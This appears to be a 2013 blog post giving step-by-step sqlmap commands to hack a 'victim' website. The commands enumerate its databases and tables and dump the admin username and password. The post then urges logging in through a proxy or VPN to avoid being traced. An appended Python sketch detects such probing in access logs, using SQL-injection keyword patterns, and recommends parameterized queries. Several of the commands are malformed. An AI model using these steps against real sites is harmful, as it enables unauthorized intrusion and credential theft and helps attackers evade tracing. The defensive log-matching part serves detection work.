Sunday, 15 December 2013

Hack website using Backtrack (sqlmap)

1. Open your BackTrack terminal, type cd /pentest/database/sqlmap and hit Enter. You are now in the sqlmap directory.
2. Now find the vulnerable site. (Well, I already have a vulnerable site.)
3. Now type this command in the terminal and hit Enter. (Refer to the figure above.)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 --dbs

4. Now you will get the database names of the website.
Well, I got two databases, aj and information_schema; we will select the aj database.

5. Now get the tables of that database. To do that, enter this command into your terminal and hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) --tables

6. Now we need to grab the tables from the aj database. Paste the command below and hit Enter.
python sqlmap.py -u http://www.yourvictim' -D aj --tables

7. Now you will get the list of tables stored in the aj database.

8. Now let's grab the columns from the admin table.
python sqlmap.py -u http://www.yourvictim' -T admin --columns
Now we have the columns, including username and password.
9. Now let's grab the passwords of the admin.
python sqlmap.py -u http://www.yourvictim' -T admin -U test --dump
Now we have the username and the password of the website!
Now just find the admin panel of the website, and use a proxy/VPN when you try to log in to the website as an admin.
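Seen from the web server's side, the steps above leave a recognisable trail in the access log: a burst of requests to index.php whose id parameter is no longer a plain number. The following detection sketch is an added example, not part of the original post; the log lines, IP addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = '''\
198.51.100.7 - - [15/Dec/2013:10:01:02 +0000] "GET /index.php?id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [15/Dec/2013:10:02:11 +0000] "GET /index.php?id=4 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [15/Dec/2013:10:02:12 +0000] "GET /index.php?id=4%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"
203.0.113.9 - - [15/Dec/2013:10:02:13 +0000] "GET /index.php?id=4%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 731 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Dec/2013:10:03:00 +0000] "GET /about.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
SQL_KEYWORDS = re.compile(
    r"\b(union\s+(all\s+)?select|information_schema|sleep\s*\(|benchmark\s*\()", re.I)

def classify(line):
    """Return (client_ip, request_target, reasons) or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _method, target, agent = m.groups()
    reasons = []
    # sqlmap's default User-Agent starts with "sqlmap/"; it is easily changed,
    # so treat this as a weak signal and rely on the parameter checks below.
    if agent.lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in params.get("id", []):  # values arrive URL-decoded
        if not value.isdigit():         # the page expects a numeric id such as 4
            reasons.append("non-numeric-id")
        if SQL_KEYWORDS.search(value):
            reasons.append("sql-keyword")
    return ip, target, reasons

def suspicious_by_ip(log_text):
    """Group the reasons of every flagged request by client IP."""
    hits = {}
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[2]:
            hits.setdefault(parsed[0], []).append(parsed[2])
    return hits

if __name__ == "__main__":
    for ip, findings in suspicious_by_ip(SAMPLE_LOG).items():
        print(ip, findings)
```

Log matching only shows that probing happened. The durable fix is in the application: bind id as a typed parameter instead of concatenating it into the SQL string.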